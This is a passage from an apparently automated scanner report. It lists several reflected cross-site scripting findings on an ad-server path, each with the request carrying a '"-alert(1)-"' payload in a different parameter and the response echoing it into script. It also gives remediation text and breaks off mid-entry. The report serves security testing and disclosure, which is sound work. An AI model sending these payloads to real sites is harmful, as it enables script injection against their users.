This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=22f2e"-alert(1)-"4dc1a9e7e19&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:38 GMT
Expires: Mon, 22 Nov 2010 00:14:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7152

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
87/38538544/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=22f2e"-alert(1)-"4dc1a9e7e19&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsi
...[SNIP]...

1.67. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34ac4"-alert(1)-"b0330c890e3 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=34ac4"-alert(1)-"b0330c890e3&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:51 GMT
Expires: Mon, 22 Nov 2010 00:09:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7152

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/x%3B231155693%3B6-0%3B0%3B54795159%3B4307-300/250%3B38520787/38538544/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=34ac4"-alert(1)-"b0330c890e3&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=201
...[SNIP]...

1.68. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e630"-alert(1)-"8fa588eb30a was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=7e630"-alert(1)-"8fa588eb30a&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:28 GMT
Expires: Mon, 22 Nov 2010 00:15:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7152

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
//adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=7e630"-alert(1)-"8fa588eb30a&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationpro
...[SNIP]...

1.69. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6b15"-alert(1)-"c72a06acb68 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAEc6b15"-alert(1)-"c72a06acb68&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:17 GMT
Expires: Mon, 22 Nov 2010 00:16:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAEc6b15"-alert(1)-"c72a06acb68&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=609AA01A&cn=itmrgquestdubai");
var fscUrl = ur
...[SNIP]...

1.70. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e003"-alert(1)-"21012b00b88 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=4e003"-alert(1)-"21012b00b88&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:33 GMT
Expires: Mon, 22 Nov 2010 00:11:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri
...[SNIP]...
z%3B231155693%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=4e003"-alert(1)-"21012b00b88&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www
...[SNIP]...

1.71. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a76"-alert(1)-"eed06fa5ff8 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=10031a76"-alert(1)-"eed06fa5ff8&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:26 GMT
Expires: Mon, 22 Nov 2010 00:13:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
0%3B0%3B54795159%3B4307-300/250%3B38520812/38538569/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=10031a76"-alert(1)-"eed06fa5ff8&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovatio
...[SNIP]...

1.72. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef3da"-alert(1)-"0e0b492657e was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=ef3da"-alert(1)-"0e0b492657e&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:18 GMT
Expires: Mon, 22 Nov 2010 00:15:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=ef3da"-alert(1)-"0e0b492657e&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itque
...[SNIP]...

1.73. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8708"-alert(1)-"6c6fa352822 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e8708"-alert(1)-"6c6fa352822&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:52 GMT
Expires: Mon, 22 Nov 2010 00:10:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7119

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
5a/17/14a/%2a/i%3B231155693%3B1-0%3B0%3B54795159%3B4307-300/250%3B37759247/37777099/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e8708"-alert(1)-"6c6fa352822&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event
...[SNIP]...

1.74. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc7e"-alert(1)-"9a508cfa52b was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18cfc7e"-alert(1)-"9a508cfa52b&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:06 GMT
Expires: Mon, 22 Nov 2010 00:16:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
7335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18cfc7e"-alert(1)-"9a508cfa52b&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationprotection&cmp=usmmb&cm=b&csr=infoprots
...[SNIP]...

1.75. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c586e"-alert(1)-"b8e9766edfd was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66Bc586e"-alert(1)-"b8e9766edfd&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:28 GMT
Expires: Mon, 22 Nov 2010 00:14:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
8011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66Bc586e"-alert(1)-"b8e9766edfd&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/process-transforma
...[SNIP]...

1.76. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11626"-alert(1)-"1111d615a75 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

